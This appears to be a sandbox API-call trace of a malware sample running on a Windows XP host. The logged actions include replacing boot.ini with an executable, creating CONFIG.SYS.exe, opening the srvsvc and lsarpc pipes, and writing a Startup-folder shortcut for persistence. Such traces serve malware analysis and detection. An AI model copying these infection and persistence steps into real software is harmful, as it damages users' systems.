"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->39287"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->39287"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->211"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->211"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->268"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->268"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x00000110","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000110","lpValueName->Desktop"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x00000110","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegSetValueExW","SUCCESS","","hKey->0x00000110","lpValueName->Desktop","dwType->1","lpData->C:\Documents and Settings\janettedoe\Desktop","cbData->90"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x00000110","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->0x00000110","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b8","lpValueName->Generation"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000000b8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b8","lpValueName->Common Desktop"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000000b8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegSetValueExW","SUCCESS","","hKey->0x000000b8","lpValueName->Common Desktop","dwType->1","lpData->C:\Documents and Settings\All Users\Desktop","cbData->88"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x00000110","hKey->0x000000b8","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000110","lpValueName->Generation"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x00000110","hKey->0x0000011c","lpSubKey->FileExts"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","FAILURE","","hKey->0x00000110","lpSubKey->."
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","FAILURE","","hKey->0x00000110","lpSubKey->."
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_CLASSES_ROOT","lpSubKey->."
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_CLASSES_ROOT","lpSubKey->SystemFileAssociations\."
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_CLASSES_ROOT","lpSubKey->."
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x00000122","hKey->0x00000062","lpSubKey->Network\SharingHandler"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000122","lpValueName->(null)"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x00000120","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\winlogon"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","FAILURE","","hKey->0x00000120","lpValueName->UserEnvDebugLevel"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x00000120","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\winlogon"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","FAILURE","","hKey->0x00000120","lpValueName->ChkAccDebugLevel"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x00000120","hKey->HKEY_LOCAL_MACHINE","lpSubKey->System\CurrentControlSet\Control\ProductOptions"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000120","lpValueName->ProductType"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x00000128","hKey->0x000000b8","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000128","lpValueName->Personal"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000128","lpValueName->Local Settings"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\winlogon"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","FAILURE","","hKey->0x000000b8","lpValueName->RsopDebugLevel"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\winlogon"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","FAILURE","","hKey->0x000000b8","lpValueName->UserEnvDebugLevel"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","FAILURE","","hKey->0x000000b8","lpValueName->RsopLogging"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Policies\Microsoft\Windows\System"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\winlogon"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","FAILURE","","hKey->0x000000b8","lpValueName->UserEnvDebugLevel"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Policies\Microsoft\Windows\System"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","system","LoadLibraryW","SUCCESS","0x773d0000","lpFileName->comctl32.dll"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","system","LoadLibraryW","SUCCESS","0x76990000","lpFileName->ntshrui.dll"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","system","LoadLibraryA","SUCCESS","0x76980000","lpFileName->LINKINFO.dll"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001b8","lpFileName->\\.\PIPE\srvsvc","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001b8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->System\CurrentControlSet\Control\ProductOptions"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001b8","lpValueName->ProductType"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001b8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->System\CurrentControlSet\Services\LanmanServer\DefaultSecurity"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","FAILURE","","hKey->0x000001b8","lpValueName->SrvsvcDefaultShareInfo"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000000b8","lpFileName->\\.\PIPE\lsarpc","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","DeleteFileW","SUCCESS","","lpFileName->C:\boot.ini"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","MoveFileWithProgressW","SUCCESS","","lpExistingFileName->C:\boot.ini.exe","lpNewFileName->C:\boot.ini"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001c0","lpFileName->C:\CONFIG.SYS","dwDesiredAccess->GENERIC_READ"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->268"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001c0","lpFileName->C:\f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","dwDesiredAccess->GENERIC_READ"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001c4","lpFileName->C:\CONFIG.SYS","dwDesiredAccess->GENERIC_READ"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001c8","lpFileName->C:\CONFIG.SYS.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001b8","lpFileName->\\.\PIPE\srvsvc","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001b8","lpFileName->C:\f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","dwDesiredAccess->0x00000080"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","device","DeviceIoControl","SUCCESS","","hDevice->0x000001b8","dwIoControlCode->0x000900c0","lpInBuffer->0x00000000","nInBufferSize->0x00000000","lpOutBuffer->0x0120ece4","nOutBufferSize->0x00000040","lpBytesReturned->0x0120ecdc","lpOverlapped->0x00000000"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001b8","lpFileName->C:\Documents and Settings\janettedoe\Start Menu\Programs\Startup\Soft.lnk","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000000ba","hKey->HKEY_CLASSES_ROOT","lpSubKey->Drive\shellex\FolderExtensions"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001be","hKey->HKEY_CLASSES_ROOT","lpSubKey->Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001be","lpValueName->DriveMask"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000001bc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001bc","lpValueName->Start Menu"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000001bc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegSetValueExW","SUCCESS","","hKey->0x000001bc","lpValueName->Start Menu","dwType->1","lpData->C:\Documents and Settings\janettedoe\Start Menu","cbData->96"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001bc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->0x000001bc","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b8","lpValueName->Generation"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000000b8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b8","lpValueName->Common Start Menu"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000000b8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegSetValueExW","SUCCESS","","hKey->0x000000b8","lpValueName->Common Start Menu","dwType->1","lpData->C:\Documents and Settings\All Users\Start Menu","cbData->94"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001bc","hKey->0x000000b8","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001bc","lpValueName->Generation"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000001bc","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001bc","lpValueName->Common AppData"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000001bc","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegSetValueExW","SUCCESS","","hKey->0x000001bc","lpValueName->Common AppData","dwType->1","lpData->C:\Documents and Settings\All Users\Application Data","cbData->106"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001bc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->0x000001bc","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b8","lpValueName->Generation"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000000b8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b8","lpValueName->AppData"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000000b8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegSetValueExW","SUCCESS","","hKey->0x000000b8","lpValueName->AppData","dwType->1","lpData->C:\Documents and Settings\janettedoe\Application Data","cbData->108"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
